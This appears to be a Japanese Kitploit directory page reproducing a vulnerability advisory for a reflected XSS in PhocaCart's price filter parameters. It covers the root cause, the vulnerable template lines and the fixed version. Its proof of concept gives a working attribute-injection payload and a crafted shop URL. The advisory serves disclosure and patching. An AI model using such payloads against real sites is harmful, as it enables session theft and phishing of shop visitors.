Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-76565 — PhocaCart の price_from & price_to フィルターパラメータによる反射型XSS | Kitploit
ツール/GitHubGitHub/toanln-cov/cve-2026-76565
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ論文と研究
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

PhocaCart の price_from & price_to フィルターパラメータによる反射型XSS

リポジトリを見る
3日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PhocaCart の price_from / price_to フィルタパラメータを介した反射型 XSS

PhocaCart ≤ 6.1.7 — 未認証の攻撃者が細工された価格フィルタ URL を介して任意の JavaScript を注入

CVE CVSS v4.0 CWE-79 Affected Researcher


概要

Joomla 向け PhocaCart 6.1.7 は、mod_phocacart_filter モジュールがインストールされ公開されている場合、price_from および price_to GET パラメータを介した反射型クロスサイトスクリプティング (XSS) に対して脆弱です。これらのパラメータは Joomla の 'string' 入力フィルタで処理されますが、このフィルタは strip_tags() のみを適用し、htmlspecialchars() は適用しません。生の値は、mod_phocacart_filter モジュールがレンダリングする価格フィルタフォーム内の HTML value="" 属性に直接出力されます。

攻撃者は細工された URL を被害者に配信します。被害者がページを読み込むと、注入されたイベントハンドラが被害者のブラウザで実行されます。認証は不要です。この攻撃には、別途配布されるモジュールである mod_phocacart_filter のインストールと公開が必要です。


影響を受けるバージョン

コンポーネント影響ありテスト環境修正版
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

脆弱性の詳細

種別: 反射型 XSS (CWE-79) 必要な認証: なし — 公開ショップのフロントエンド CSRF トークン: 不要 (GET リクエスト) シンクファイル: site/layouts/form_filter_horizontal_text.php:65,71

根本原因

Joomla の 'string' 入力フィルタは strip_tags() を呼び出します。これは HTML タグを除去しますが、"、'、> などの HTML 特殊文字はエンコードされずに残します。price_from および price_to GET パラメータはこのフィルタで取得され、$data['getparams'] に格納されます。テンプレートファイルは htmlspecialchars() を呼び出さずにこれらの値を value="" 属性に直接出力するため、属性コンテキストでのインジェクションが可能になります。

データフロー — ソースからシンクまで:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — 脆弱なシンク

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

同じシンクパターンは form_filter_text.php:81,87 (縦型レイアウトのバリアント) にも存在します。price_from と price_to の両パラメータは同様に脆弱です。


概念実証 (PoC)

1. 悪意のある URL を細工する

攻撃者は、price_from パラメータにイベントハンドラのペイロードを注入した、ショップの商品一覧ビュー (items view) を対象とする URL を構築します。ペイロードは value="" 属性のコンテキストから抜け出します。

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. 被害者がページを読み込む — ページ読み込み時に XSS が発火

被害者が細工された URL を開くと、ショップの商品一覧ページは価格フィルタフォームをレンダリングします。注入された属性は <input> 要素内に存在します。autofocus onfocus ペイロードにより、JavaScript は追加のユーザー操作なしでページ読み込み時に即座に実行されます。

レンダリングされた HTML (脆弱な状態):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

被害者のブラウザで発火する XSS アラートダイアログ — alert(document.domain) がショップフロントエンドでの実行を確認

被害者のブラウザで XSS が発火 — alert(document.domain) がショップフロントエンドでの実行コンテキストを確認


影響

  1. セッション Cookie の窃取 — 武器化されたペイロードは、被害者のセッション Cookie を攻撃者が管理するサーバーに外部流出させ、アカウント乗っ取りを可能にします。
  2. フィッシング / 認証情報の収集 — ペイロードは被害者を攻撃者のドメイン上にホストされた偽のログインページにリダイレクトし、信頼されたショップのドメイン名のもとで認証情報を取得します。
  3. マルウェアの配布 — ショップの信頼されたオリジンが悪用され、攻撃者が細工したリンクをクリックした被害者に対してドライブバイダウンロードやエクスプロイトキットを配信する可能性があります。

参照

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • GitHub アドバイザリ: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • ベンダーリポジトリ: https://github.com/PhocaDesign/PhocaCart
ツールをダウンロード